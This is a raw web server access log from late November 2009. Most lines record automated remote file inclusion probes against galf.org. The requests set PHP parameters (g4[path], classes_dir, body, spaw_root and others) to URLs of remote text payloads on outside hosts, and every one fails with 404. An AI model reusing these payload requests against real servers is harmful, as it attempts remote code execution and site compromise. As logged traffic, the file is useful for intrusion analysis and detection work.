211.255.23.47 - - [30/Nov/2009:00:43:38 -0800] "GET /logs//gnuboard4/index.php?g4[path]=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [30/Nov/2009:00:43:38 -0800] "GET /gnuboard4/index.php?g4[path]=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.214.172.86 - - [30/Nov/2009:00:44:22 -0800] "GET /logs/access_090622.log//gnuboard4/index.php?g4[path]=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.64.9 - - [30/Nov/2009:00:44:37 -0800] "GET /logs/access_090622.log//gnuboard4/index.php?g4[path]=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.64.9 - - [30/Nov/2009:00:44:37 -0800] "GET /logs//gnuboard4/index.php?g4[path]=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.64.9 - - [30/Nov/2009:00:44:37 -0800] "GET /logs/access_090713.log//gnuboard4/index.php?g4[path]=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.64.9 - - [30/Nov/2009:00:44:37 -0800] "GET /gnuboard4/index.php?g4[path]=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [30/Nov/2009:00:44:54 -0800] "GET /logs/access_090622.log//gnuboard4/index.php?g4[path]=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.64.9 - - [30/Nov/2009:00:45:22 -0800] "GET /logs//gnuboard4/index.php?g4[path]=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.64.9 - - [30/Nov/2009:00:45:22 -0800] "GET /logs/access_090713.log//gnuboard4/index.php?g4[path]=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.64.9 - - [30/Nov/2009:00:45:26 -0800] "GET /logs/access_090622.log//gnuboard4/index.php?g4[path]=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.64.9 - - [30/Nov/2009:00:45:28 -0800] "GET /gnuboard4/index.php?g4[path]=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.202.2.220 - - [30/Nov/2009:00:54:12 -0800] "GET /logs/access.log//limbo/classes/adodbt/sql.php?classes_dir=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.202.2.220 - - [30/Nov/2009:00:54:12 -0800] "GET /limbo/classes/adodbt/sql.php?classes_dir=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.202.2.220 - - [30/Nov/2009:00:54:12 -0800] "GET /logs//limbo/classes/adodbt/sql.php?classes_dir=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.202.2.220 - - [30/Nov/2009:00:54:17 -0800] "GET /logs/access_090914.log//limbo/classes/adodbt/sql.php?classes_dir=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.202.2.220 - - [30/Nov/2009:00:54:17 -0800] "GET /logs//limbo/classes/adodbt/sql.php?classes_dir=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.202.2.220 - - [30/Nov/2009:00:54:17 -0800] "GET /limbo/classes/adodbt/sql.php?classes_dir=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.202.2.220 - - [30/Nov/2009:00:56:01 -0800] "GET /limbo/classes/adodbt/sql.php?classes_dir=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.202.2.220 - - [30/Nov/2009:00:56:01 -0800] "GET /logs//limbo/classes/adodbt/sql.php?classes_dir=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.202.2.220 - - [30/Nov/2009:00:56:01 -0800] "GET /logs/access.log//limbo/classes/adodbt/sql.php?classes_dir=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.202.2.220 - - [30/Nov/2009:00:56:06 -0800] "GET /logs/access_090914.log//limbo/classes/adodbt/sql.php?classes_dir=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.202.2.220 - - [30/Nov/2009:00:56:06 -0800] "GET /logs//limbo/classes/adodbt/sql.php?classes_dir=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.202.2.220 - - [30/Nov/2009:00:56:06 -0800] "GET /limbo/classes/adodbt/sql.php?classes_dir=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.202.2.220 - - [30/Nov/2009:00:56:42 -0800] "GET /limbo/classes/adodbt/sql.php?classes_dir=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.202.2.220 - - [30/Nov/2009:00:56:43 -0800] "GET /logs//limbo/classes/adodbt/sql.php?classes_dir=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.202.2.220 - - [30/Nov/2009:00:56:43 -0800] "GET /logs/access.log%20%20//limbo/classes/adodbt/sql.php?classes_dir=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.202.2.220 - - [30/Nov/2009:00:56:43 -0800] "GET /limbo/classes/adodbt/sql.php?classes_dir=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.202.2.220 - - [30/Nov/2009:00:56:43 -0800] "GET /logs//limbo/classes/adodbt/sql.php?classes_dir=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.202.2.220 - - [30/Nov/2009:00:56:43 -0800] "GET /logs/access_090914.log%20%20//limbo/classes/adodbt/sql.php?classes_dir=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.202.2.220 - - [30/Nov/2009:00:57:01 -0800] "GET /limbo/classes/adodbt/sql.php?classes_dir=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.202.2.220 - - [30/Nov/2009:00:57:01 -0800] "GET /logs//limbo/classes/adodbt/sql.php?classes_dir=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.202.2.220 - - [30/Nov/2009:00:57:01 -0800] "GET /logs/access.log//limbo/classes/adodbt/sql.php?classes_dir=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.202.2.220 - - [30/Nov/2009:00:57:15 -0800] "GET /logs/access_090907.log//limbo/classes/adodbt/sql.php?classes_dir=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.202.2.220 - - [30/Nov/2009:00:57:51 -0800] "GET /limbo/classes/adodbt/sql.php?classes_dir=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.202.2.220 - - [30/Nov/2009:00:57:51 -0800] "GET /logs/access_090706.log//limbo/classes/adodbt/sql.php?classes_dir=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.202.2.220 - - [30/Nov/2009:00:57:52 -0800] "GET /logs//limbo/classes/adodbt/sql.php?classes_dir=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.202.2.220 - - [30/Nov/2009:00:57:52 -0800] "GET /logs/access_090831.log//limbo/classes/adodbt/sql.php?classes_dir=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.94.33.242 - - [30/Nov/2009:00:58:32 -0800] "GET /logs/access_091102.log//modules/xfsection/modify.php?dir_module=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.94.33.242 - - [30/Nov/2009:00:58:32 -0800] "GET /modules/xfsection/modify.php?dir_module=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.94.33.242 - - [30/Nov/2009:00:58:32 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.202.2.220 - - [30/Nov/2009:00:58:54 -0800] "GET /limbo/classes/adodbt/sql.php?classes_dir=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.202.2.220 - - [30/Nov/2009:00:58:54 -0800] "GET /logs/access_090831.log//limbo/classes/adodbt/sql.php?classes_dir=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.202.2.220 - - [30/Nov/2009:00:58:54 -0800] "GET /logs//limbo/classes/adodbt/sql.php?classes_dir=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.202.2.220 - - [30/Nov/2009:00:58:54 -0800] "GET /logs/access_090706.log//limbo/classes/adodbt/sql.php?classes_dir=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.94.33.242 - - [30/Nov/2009:00:59:32 -0800] "GET /logs/access_090914.log//modules/xfsection/modify.php?dir_module=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.47.80.39 - - [30/Nov/2009:01:00:13 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.galf.org"
193.47.80.39 - - [30/Nov/2009:01:00:13 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.galf.org"
85.94.33.242 - - [30/Nov/2009:01:02:11 -0800] "GET /modules/xfsection/modify.php?dir_module=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.94.33.242 - - [30/Nov/2009:01:02:11 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.94.33.242 - - [30/Nov/2009:01:02:11 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
65.55.207.51 - - [30/Nov/2009:01:02:31 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:01:03:01 -0800] "GET /logs/access_090713.log//index.php?body=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:01:03:01 -0800] "GET /logs//index.php?body=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:01:03:01 -0800] "GET /index.php?body=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:06:31 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:06:31 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:06:32 -0800] "GET /logs/access_090907.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.71.237.150 - - [30/Nov/2009:01:07:16 -0800] "GET /skin/happycast_category_bluishgreen/login.php?dir=http://woorizip1004.net/zboard/data/album2/1239110194/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.71.237.150 - - [30/Nov/2009:01:07:16 -0800] "GET /logs//skin/happycast_category_bluishgreen/login.php?dir=http://woorizip1004.net/zboard/data/album2/1239110194/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.71.237.150 - - [30/Nov/2009:01:07:19 -0800] "GET /logs/access.log//skin/happycast_category_bluishgreen/login.php?dir=http://woorizip1004.net/zboard/data/album2/1239110194/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
89.186.1.54 - - [30/Nov/2009:01:07:35 -0800] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://bablytrade.com/den/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.186.1.54 - - [30/Nov/2009:01:07:35 -0800] "GET /logs///admin/spaw/spaw_control.class.php?spaw_root=http://bablytrade.com/den/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.186.1.54 - - [30/Nov/2009:01:07:35 -0800] "GET /logs/access_091019.log%20%20///admin/spaw/spaw_control.class.php?spaw_root=http://bablytrade.com/den/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:01:07:56 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:01:07:56 -0800] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:01:07:56 -0800] "GET /logs/access_091026.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:01:08:18 -0800] "GET /logs/access_090629.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:11:07 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:11:07 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:11:07 -0800] "GET /logs/access_090907.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:11:17 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:11:17 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:11:20 -0800] "GET /logs/access_090907.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:11:33 -0800] "GET /logs/access_090914.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:11:34 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:11:34 -0800] "GET /logs/access_090907.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [30/Nov/2009:01:11:36 -0800] "GET //vwar/backup/errors.php?error=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [30/Nov/2009:01:11:36 -0800] "GET /logs/access_091116.log///vwar/backup/errors.php?error=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [30/Nov/2009:01:11:36 -0800] "GET /logs///vwar/backup/errors.php?error=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:11:41 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:11:56 -0800] "GET /logs/access_090907.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:12:00 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:12:00 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [30/Nov/2009:01:12:11 -0800] "GET //vwar/backup/errors.php?error=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [30/Nov/2009:01:12:11 -0800] "GET /logs///vwar/backup/errors.php?error=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [30/Nov/2009:01:12:11 -0800] "GET /logs/access_091116.log%20%20///vwar/backup/errors.php?error=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:12:15 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:12:15 -0800] "GET /logs/access_090907.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:12:19 -0800] "GET /index.php?body=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:12:22 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:12:25 -0800] "GET /logs/index.php?body=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:12:28 -0800] "GET /logs/access_090907.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:12:28 -0800] "GET /logs/access_090914.log/index.php?body=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:12:28 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:12:29 -0800] "GET /index.php?body=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:12:29 -0800] "GET /logs/index.php?body=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:12:30 -0800] "GET /index.php?body=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:12:30 -0800] "GET /logs/index.php?body=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:12:30 -0800] "GET /logs/access_090914.log/index.php?body=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:12:31 -0800] "GET /logs/access_090914.log/index.php?body=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:12:32 -0800] "GET /index.php?body=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:12:34 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:12:35 -0800] "GET /logs/access_090914.log/index.php?body=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:12:35 -0800] "GET /logs/access_090914.log/index.php?body=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:12:35 -0800] "GET /index.php?body=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:12:35 -0800] "GET /logs/index.php?body=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:12:38 -0800] "GET /logs/index.php?body=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:12:38 -0800] "GET /index.php?body=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:01:12:42 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:01:12:42 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:01:12:42 -0800] "GET /logs/access_091026.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:12:43 -0800] "GET /logs/access_090914.log/index.php?body=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:12:43 -0800] "GET /logs/index.php?body=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:13:00 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:13:00 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:13:01 -0800] "GET /logs/access_090907.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:15:01 -0800] "GET /logs/access_090914.log%20%20/index.php?body=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:01:15:10 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:01:15:10 -0800] "GET /logs/access_091026.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:01:15:10 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:01:15:10 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
